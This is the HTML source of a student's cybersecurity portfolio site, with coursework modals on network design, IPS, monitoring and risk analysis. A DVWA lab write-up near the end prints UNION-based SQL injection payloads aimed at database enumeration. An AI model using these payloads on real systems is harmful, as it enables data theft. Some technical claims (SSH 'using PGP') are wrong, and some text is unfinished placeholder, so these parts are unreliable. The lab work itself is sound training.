          <p class="text-muted">Security of IOT protocols and technology</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal27">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/27-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pen-test at COMPANY_NAME_HERE</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal28">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a smartphone app</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal29">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a website</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal30">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a device</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal31">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Organize a weekly Hack The Box event</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Blue teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal32">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/32-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal33">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">IDS technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal34">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/34-thumbnail.svg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Monitoring technologies</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal35">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/35-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">SIEM technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal36">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/36-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Threat use cases</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal37">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Developing and tuning an IDS</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal38">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
           <img class="img-fluid" src="img/portfolio/minor/blue/38-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Setting up a SOC</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal39">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/39-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability scanning</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal40">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/40-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security monitoring, analysis and triage</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Forensics specialisation</h5>
          </div>
          </div>
          </div>
          </section>
          
          <section id="about">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About</h2>
          <h3 class="section-subheading text-muted">My cyber security career.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <ul class="timeline">
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/1.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S3 2019</h4>
          <h4 class="subheading">The beginning</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was the first time I got experienced the cyber security stream and what it had to offer. I learned the basics of the defensive side of cyber security.</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/2.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S4 2020</h4>
          <h4 class="subheading">Round 2</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was my second semester on cyber security this time focusing on the offensive side.</p>
          </div>
          </div>
          </li>
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/3.png" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S5 2021</h4>
          <h4 class="subheading">The internship</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/4.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S7 2021</h4>
          <h4 class="subheading">My minor</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          
          <li class="timeline-inverted">
          <div class="timeline-image">
          <h4>The
          <br>Future
          </h4>
          </div>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="team">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About me</h2>
          <h3 class="section-subheading text-muted">Some additional links and information.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-sm-4">
          
          </div>
          <div class="col-sm-4">
          <div class="team-member">
          <img class="mx-auto rounded-circle" src="img/team/Pim.jpg" alt="">
          <h4>Pim Beekmans</h4>
          <p class="text-muted">Student</p>
          <ul class="list-inline social-buttons">
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-twitter"></i>
          </a>
          </li>
          <li class="list-inline-item">
           <a href="#">
          <i class="fab fa-facebook-f"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="https://www.linkedin.com/in/pim-beekmans/?originalSubdomain=nl">
          <i class="fab fa-linkedin-in"></i>
          </a>
          </li>
          </ul>
          </div>
          </div>
          <div class="col-sm-4">
          
          </div>
          <div class="row">
          <div class="col-lg-8 mx-auto text-center">
          <p class="large text-muted">This is me, thank you for reading, hopefully you've liked my portfolio on cyber security. For additional feedback feel free to send an email to <a href="/cdn-cgi/l/email-protection#ddadb4b09dbfb8b8b6b0bcb3aef3b9b8ab"><span class="__cf_email__" data-cfemail="1a6a73775a787f7f71777b7469347e7f6c">[email&#160;protected]</span></a>.</p>
          </div>
          </div>
          </div>
          </div>
          </section>
          
          <section class="py-5">
          <div class="container">
          <div class="row">
          
          </div>
          </div>
          </section>
          
          <section id="contact">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Contact Me</h2>
          <br>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <form id="contactForm" name="sentMessage" novalidate="novalidate">
          <div class="row">
          <div class="col-md-6">
          <div class="form-group">
          <input class="form-control" id="name" type="text" placeholder="Your Name *" required="required" data-validation-required-message="Please enter your name.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="email" type="email" placeholder="Your Email *" required="required" data-validation-required-message="Please enter your email address.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="phone" type="tel" placeholder="Your Phone *" required="required" data-validation-required-message="Please enter your phone number.">
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="col-md-6">
          <div class="form-group">
          <textarea class="form-control" id="message" placeholder="Your Message *" required="required" data-validation-required-message="Please enter a message."></textarea>
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="clearfix"></div>
          <div class="col-lg-12 text-center">
          <div id="success"></div>
          <button id="sendMessageButton" class="btn btn-primary btn-xl text-uppercase" type="submit">Send Message</button>
          </div>
          </div>
          </form>
          </div>
          </div>
          </div>
          </section>
          
          <footer>
          <div class="container">
          <div class="row">
          <div class="col-md-4">
          <span class="copyright">Copyright &copy; Beekmans.dev 2019</span>
          </div>
          <div class="col-md-4">
          
          </div>
          <div class="col-md-4">
          <ul class="list-inline quicklinks">
          <li class="list-inline-item">
          <a href="#">Privacy Policy</a>
          </li>
          <li class="list-inline-item">
          <a href="#">Terms of Use</a>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </footer>
          
          
          <div class="portfolio-modal modal fade" id="portfolioModal1" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Self Assessment</h2>
          <p class="item-intro text-muted">Week 1</p>
          <p>
          <ol>
          <li>What did you like / or find easy?</li>
          <li>What did you find difficult? At what point did it get too difficult for now?</li>
          <li>
          Then check the list of learning subjects for the basic knowledge assignment and
          possibilities and requirements for the project.
          <ul>
          <li>What subjects do you already know and what is unknown terrain for you?</li>
          </ul>
          </li>
          <li>What parts of the current semester would you like to give much attention?</li>
          <li>What do you want to achieve and learn in particular?</li>
          <li>Which study style and corresponding planning is most suitable for you?</li>
          <li>What would you like to do or achieve in the project? (subjects, type of project,
          domain to work in, learning goals, etc.)
          </li>
          </ol>
          <br>
          Answers:
          <br>
           <ol>
          <li>I like working with servers and playing with my network at home and virtual
          machines. I think I find basic networking the easiest.
          </li>
          <li>Advanced networking all knowledge that I know is self-taught so I think there is a
          lot I don’t know yet. I got stuck on virtual lans and ip routing at home what else
          I’ll find difficult is what I need to find out in the distant future.
          </li>
          <li>
          Subjects:
          <div class="container">
          <div class="row">
          <div class="col-sm-4">
          <ul>
          Used:
          <li>VMWare</li>
          <li>Linux</li>
          <li>IPv4</li>
          <li>NAT</li>
          <li>TCP/IP</li>
          <li>DNS</li>
          <li>HTTP</li>
          <li>FTP</li>
          <li>Firewalls</li>
          <li>HTTPS</li>
          <li>VPN</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Know about but never used:
          <li>VMWare ESX</li>
          <li>Wireshark</li>
          <li>ARP</li>
          <li>IP routing</li>
          <li>SMTP</li>
          <li>IDS</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Never heard about it:
          <li>Seclab</li>
          <li>ICMP ping</li>
          <li>CIA and IT Risk analysis</li>
          </ul>
          </div>
          </div>
          </div>
          </li>
          <li>Advanced networking and the transition to Java.</li>
          <li>How to be a good Cyber security expert.</li>
          <li>Style 2, I’ll try to find out if this is the most suitable for me and maybe go to
          the style 3 courses on the days I get subjects I already know.
          </li>
          <li>I don’t really have a preference I want to learn as much as possible related to
          cyber security.
          </li>
          </ol>
          </p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
           <li>Client: Fontys</li>
          <li>Category: Self assessment</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal2" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagram.png" alt="">
          <p>This network diagram shows 3 main VLAN's containing a employee environment for the
          employees to work on, a guest environment for the people visiting the company as guests
          and a DMZ for the servers and services to the outside world.</p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal3" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram V2</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagramV2.png" alt="">
          <p>This is the second version of my network diagram. I changed a few things to match
          Casper's feedback. The first thing I changed are the firewalls, I only needed to address
          the physical firewall and not the ones for every single interface. The last thing was I
          added the corresponding IP ranges and subnets to each VLAN.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal4" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Secure connections</p>
          <a href="../../img/portfolio/blue/sshAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sshAccess.png" alt=""></a>
          <p>Here you can see that I made a SSH connection to my Ubuntu webserver. I use Putty as my
          SSH terminal. SSH is encrypted using PGP (Pretty good privacy) which uses a public and a
          private key to communicate with each other. This is especially helpful because you don't
          need to transfer passwords to encrypt the connection. The sending client encrypts its
          message using the public key from the recipient and the recipient decrypts the message
          using its own private key. This works the same the other way around. I can use this
          technique to remotely manage my webservers without the need physical access.</p>
          <a href="../../img/portfolio/blue/vpnAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/vpnAccess.png" alt=""></a>
          <p>Here you can see that I'm connected to a VPN. This VPN is OpenVPN and runs on the PfSense
          router. It gives me access to the subnets I gave it access to and with this I can
          remotely manage my whole network, with being actually physically connected to the
          network. The OpenVPN connection is encrypted be TLS (Transfer layer security) which is
          successor from SSL. TLS uses a handshake at the start of the connection where a key is
          shared between the 2 clients. This key will be used for the symmetric encryption of the
          messages. The authenticity of the connection is secured by a certificate and the public
          key of the webserver this prevents possible man in the middle attacks, where someone
          will pretend to be another website for example.</p>
          <a href="../../img/portfolio/blue/sslConnection.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sslConnection.png" alt=""></a>
          <p>Here you can see the ssl certificate I created for the website that is running my
          portfolio. I created the script using certbot in Ubuntu and the CA is Let's encrypt
          authority x3. The website automatically forces all traffic to https, the website is
          still accessible by http but will redirect the user to https.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Secure connections</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal5" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IDS/IPS</p>
          <P>I implemented Suricata as my IPS, I thought it would be the best option because they say
          it's more advanced and newer. Below you can see some prove of the implementation and
          some results I came across.</P>
          <a href="../../img/portfolio/blue/Suricata1.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata1.png" alt=""></a>
          <p>I configured the IPS to monitor the WAN and LAN interface for now but I'm planning to
          configure it to the Employee VLAN as well. This will protect the company for any
          potential threats from the inside.</p>
          <a href="../../img/portfolio/blue/Suricata2.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata2.png" alt=""></a>
          <p>I tested the IPS with a website called <a href="https://www.wicar.org/">Wicar</a>. On
          this website you can run malicious code and test you network without it being an actual
          threat or risk.</p>
          <a href="../../img/portfolio/blue/Suricata3.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata3.png" alt=""></a>
          <p>I have used the Snort community rules and the Emerging threats rules these are both free
          to use and do a decent job of protecting the network with not too many false
          positives.</p>
          <a href="../../img/portfolio/blue/DDOSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/DDOSAlert.png" alt=""></a>
          <p>We encountered a real world scenario which actually turned out to work really well with
          an IPS. Bram tried to DDOS my website while it was running in my pfsense environment.
          The IPS immediately noticed this and blocked his IP. While the website was running
          outside the pfsense zone Bram could DDOS all he want without getting blocked.</p>
          <a href="../../img/portfolio/blue/BlockList.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BlockList.png" alt=""></a>
          <p>Here you can see Bram's IP in the Suricata blocklist.</p>
          <a href="../../img/portfolio/blue/Bram'sIP.jpg"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Bram'sIP.jpg" alt=""></a>
          <p>This is a screenshot from Bram's computer with his IP he used for generating the
          alert.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: IDS/IPS</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal6" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Information Security and Risk Analysis</p>
          <h3>CIA</h3>
          <h4>Confidentiality:</h4>
          <p>The company will hold confidential data from costumers, things like credit card
          information user accounts and databases for the costumer's websites.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Costumer data .... Leak</li>
          </ul>
          <h4>Integrity:</h4>
          <p>The costumers trust the company to secure their servers on their end and they trust the
          company that it won't sell any costumer data to 3rd parties.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Correct .... Tampering</li>
          </ul>
          <h4>Availability:</h4>
          <p>Because the costumers might use these websites for commercial use, it is at the utmost
          importance that the websites are fast, reliable and 24/7 reachable.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
           <li>Well timed .... Delay</li>
          <li>Continuity .... Downtime</li>
          </ul>
          <p>Click on this <a href="../../img/portfolio/Risk%20analysis.xlsx">link</a> to download the full
          risk analysis.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Risk Analysis</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal7" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IT Monitoring</p>
          <p>I implemented a Nagios server and installed Ntop as part of my network monitoring
          system.</p>
          <a href="../../img/portfolio/blue/OnlineHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/OnlineHosts.png" alt=""></a>
          <p>Ntop generates a list with all hosts that are online on the network and you can filter
          them by VLAN. You can see how much bandwidth they are using how much data was
          transferred since they are online and how many flows are going to that host.</p>
          <a href="../../img/portfolio/blue/MostUsedHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedHosts.png" alt=""></a>
          <p>Here I can see which host uses the most traffic in my DMZ. With 172.16.0.2 being the
          apache server and 172.16.0.3 being the IIS server.</p>
          <a href="../../img/portfolio/blue/MostUsedProtocols.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedProtocols.png" alt=""></a>
          <p>Here I can see which protocols are used the most. Windows update on number 1 because it
          needs to download a lot and after that ssl for the https traffic to my website and ftp
          to push changes. This doesn't indicate that the most traffic is going to windows update
          only that it used the most bandwidth.</p>
          <a href="../../img/portfolio/blue/BulgarianHacker.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BulgarianHacker.png" alt=""></a>
          <p>Ntop even managed to identify a rogue Bulgarian hacker trying to access my Jenkins
          server.</p>
          <a href="../../img/portfolio/blue/HostsStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostsStatus.png" alt=""></a>
          <p>This is Nagios it is in some ways similar to Ntop but is much more advanced and can do
          some things that Ntop can't. On this page you can see al the hosts that are monitored by
          Nagios. It displays if the hosts are up and running or if there are any problems.</p>
          <a href="../../img/portfolio/blue/HostDetails.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostDetails.png" alt=""></a>
          <p>If you click on one of the monitored hosts from the previous picture Nagios will show you
          with a more detailed report on the host with some more information about uptime and
          status.</p>
          <a href="../../img/portfolio/blue/ServiceStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/ServiceStatus.png" alt=""></a>
          <p>This is a great example on something Nagios is much better at then Ntop. Here Nagios
          monitors all the services you flagged on different hosts. For example your apache server
          could be down but the physical Linux server is still up and running. Nagios and Ntop
          will both say this Linux machine is up and fine but Nagios will also say that the
          http/https service is down. The same goes for every other service you configure to
          monitor (SSH/FTP).</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Monitoring</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal8" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">SQL injection</p>
          <a href="../../img/portfolio/red/SqlStart.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/SqlStart.png" alt=""></a>
          <p>I applied sql injection on a search function in DVWA.</p>
           <a href="../../img/portfolio/red/CheckIfVuln.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVuln.png" alt=""></a>
          <p>The easiest way to check if the search function is vulnerable is to just type some
          gibberish that the search function doesn't expect. This should generate a sql error.</p>
          <a href="../../img/portfolio/red/CheckIfVulnResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVulnResult.png" alt=""></a>
          <p>And it did! Now we know that the search function is vulnerable and we can try some
          injections</p>
          <p>So know we can check which database we're dealing with by getting the version.</p>
          <a href="../../img/portfolio/red/GetDbVersion.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetDbVersion.png" alt=""></a>
          <p>Oke let's break it down.</p>
          <p>The query that is used for searching the users probably looks like something like this
          "SELECT first_name, last_name FROM users WHERE user_id = '$id'" and I typed "null' UNION
          select CURRENT_user, @@version #"</p>
          <p>The "null'" ends the original query and makes it obsolete because there probably aren't
          any users with a 'null' as id. The 'UNION' allows me to execute a subquery and the
          result from this query gets added underneath the results from the original query.</p>
          <p>Now I use 'select' to indicate which information I want to get. I used 'CURRENT_user' and
          '@@version' to get both the current user and the database version.</p>
          <p>The reason that I select both the "CURRENT_user" and the "@@version" in the same query,
          is that if I would only select for example "@@version" I would get the error displayed
          below. I could have fixed that by rewriting the query like this: "INSERT QUERY" and I
          typed "null' UNION select @@version, @@version #" This way the subquery matches the
          amount of columns of the original query again.</p>
          <a href="../../img/portfolio/Use%20Of%23.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/Use%20Of%23.png" alt=""></a>
          <p>TALK ABOUT THE #</p>
          <a href="../../img/portfolio/red/DiffNumberColumns.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/DiffNumberColumns.png" alt=""></a>
          <p>Now we can execute any query we want as long as it matches the amount of columns of the
          original query, otherwise we get a error like the one displayed above. Now we can try
          something that has a little more impact.</p>
          <a href="../../img/portfolio/red/GetAllTables.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetAllTables.png" alt=""></a>
          <p>For example by getting all the table names inside the database. This is obvious not a
          good sign because I good use this to determine what the names are of the user tables and
          check if there might be some more tables I want to focus on, for example credit card
          information of the users.</p>
